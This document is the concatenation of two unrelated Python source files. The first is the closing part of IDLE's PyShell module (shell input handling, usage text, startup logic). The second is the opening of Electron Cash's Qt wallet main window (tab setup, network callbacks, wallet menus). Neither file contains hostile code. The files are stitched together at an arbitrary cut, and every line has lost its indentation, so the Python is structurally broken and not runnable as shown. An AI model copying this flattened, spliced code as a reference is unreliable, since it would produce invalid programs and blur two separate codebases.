if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, lines):
for line in lines:
self.write(line)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electroncash import keystore
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash.networks import NetworkConstants
from electroncash.plugins import run_hook
from electroncash.i18n import _
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, ExcessiveFee,
UserCancelled, bh2u, bfh, format_fee_satoshis)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
Address.show_cashaddr(config.get('show_cashaddr', False))
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.png"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electron-cash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
tx, wallet = args
if wallet == self.wallet: # filter out tx's not for this wallet
self.tx_notifications.append(tx)
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
pass
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (NetworkConstants.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electron Cash preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("Optional &Features"), self.internal_plugins_dialog)
tools_menu.addAction(_("Installed &Plugins"), self.external_plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
